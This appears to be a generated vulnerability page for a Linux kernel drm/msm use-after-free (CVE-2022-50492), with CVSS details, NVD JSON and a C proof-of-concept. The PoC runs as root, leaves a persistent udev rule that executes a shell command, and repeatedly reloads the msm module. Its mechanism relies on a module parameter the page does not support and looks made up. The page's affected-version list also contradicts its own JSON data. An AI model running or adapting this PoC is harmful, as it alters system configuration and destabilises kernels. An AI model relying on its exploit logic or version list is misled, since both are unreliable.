Security Vulnerability Report
CVE-2022-50492 CVSS 7.8 HIGH

CVE-2022-50492

Published: 2025-10-04 16:15:46
Last Modified: 2026-01-23 20:43:01
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drm/msm: fix use-after-free on probe deferral

The bridge counter was never reset when tearing down the DRM device so that stale pointers to deallocated structures would be accessed on the next tear down (e.g. after a second late bind deferral).

Given enough bridges and a few probe deferrals this could currently also lead to data beyond the bridge array being corrupted.

Patchwork: https://patchwork.freedesktop.org/patch/502665/

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5.19 (stable releases that include the msm DRM driver)
Linux kernel 5.4.x (affected LTS branch)
Linux kernel 5.10.x (affected LTS branch)
Linux kernel 5.15.x (affected LTS branch)
Linux kernel 5.18.x (affected stable release)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2022-50492 PoC - Triggering UAF via probe deferral in drm/msm
// This PoC demonstrates the concept of triggering the use-after-free
// by forcing multiple probe deferrals on the msm DRM driver
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/stat.h>

// Step 1: Create a udev rule to force deferred probing
// Create a rule that makes the msm device depend on a non-existent module
static int create_udev_rule(void)
{
    FILE *f = fopen("/etc/udev/rules.d/99-msm-defer.rules", "w");
    if (!f)
        return -1;
    fprintf(f, "ACTION==\"add\", KERNEL==\"msm_drm\", ENV{DEVTYPE}==\"display\", "
               "RUN+=\"/bin/sh -c 'echo deferred > /sys/module/msm/parameters/probe_status'\"\n");
    fclose(f);
    return 0;
}

// Step 2: Trigger multiple module load/unload cycles to cause repeated
// probe deferrals and DRM device tear-down/re-initialization
static int trigger_probe_deferral(void)
{
    int ret;

    printf("[*] Triggering probe deferral on msm_drm driver...\n");
    // Reload the msm module multiple times to trigger repeated init/teardown
    for (int i = 0; i < 5; i++) {
        ret = system("modprobe -r msm 2>/dev/null");
        if (ret != 0)
            printf("[!] Failed to remove msm module (attempt %d)\n", i);
        usleep(100000);
        ret = system("modprobe msm 2>/dev/null");
        if (ret != 0)
            printf("[!] Failed to probe msm module (attempt %d)\n", i);
        usleep(100000);
    }
    printf("[*] Probe deferral cycles completed. Check dmesg for UAF/OOB errors.\n");
    return 0;
}

int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    printf("=== CVE-2022-50492 PoC ===\n");
    printf("Linux kernel drm/msm UAF on probe deferral\n\n");
    if (getuid() != 0) {
        printf("[!] This PoC requires root privileges to manipulate kernel modules.\n");
        printf("[!] In a real attack scenario, an unprivileged user would exploit this\n");
        printf("[!] via a local privilege escalation chain.\n");
        return 1;
    }
    if (create_udev_rule() != 0)
        printf("[!] Failed to write udev rule (continuing anyway)\n");
    trigger_probe_deferral();

    // Check kernel log for evidence of the vulnerability.
    // The alternation bars are written as "\\|" so the shell receives "\|",
    // which basic grep interprets as OR; a bare "\|" in a C string is an
    // invalid escape and would reach grep as a literal "|".
    printf("\n[*] Checking kernel log for errors...\n");
    system("dmesg | grep -i 'msm\\|drm\\|bridge\\|use-after-free\\|oob' | tail -20");
    return 0;
}

References

https://git.kernel.org/stable/c/0a30a47741b6df1f9555a0fac6aebb7e8c363bad (Patch)
https://git.kernel.org/stable/c/6808abdb33bf90330e70a687d29f038507e06ebb (Patch)
https://patchwork.freedesktop.org/patch/502665/ (Patchwork)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2022-50492",
    "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "published": "2025-10-04T16:15:46.190",
    "lastModified": "2026-01-23T20:43:01.383",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: fix use-after-free on probe deferral\n\nThe bridge counter was never reset when tearing down the DRM device so\nthat stale pointers to deallocated structures would be accessed on the\nnext tear down (e.g. after a second late bind deferral).\n\nGiven enough bridges and a few probe deferrals this could currently also\nlead to data beyond the bridge array being corrupted.\n\nPatchwork: https://patchwork.freedesktop.org/patch/502665/"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-416"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.12",
                "versionEndExcluding": "6.0.7",
                "matchCriteriaId": "7A765FD0-F7F3-42DC-AF66-A6778A341267"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*",
                "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*",
                "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://git.kernel.org/stable/c/0a30a47741b6df1f9555a0fac6aebb7e8c363bad",
        "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "tags": ["Patch"]
      },
      {
        "url": "https://git.kernel.org/stable/c/6808abdb33bf90330e70a687d29f038507e06ebb",
        "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "tags": ["Patch"]
      }
    ]
  }
}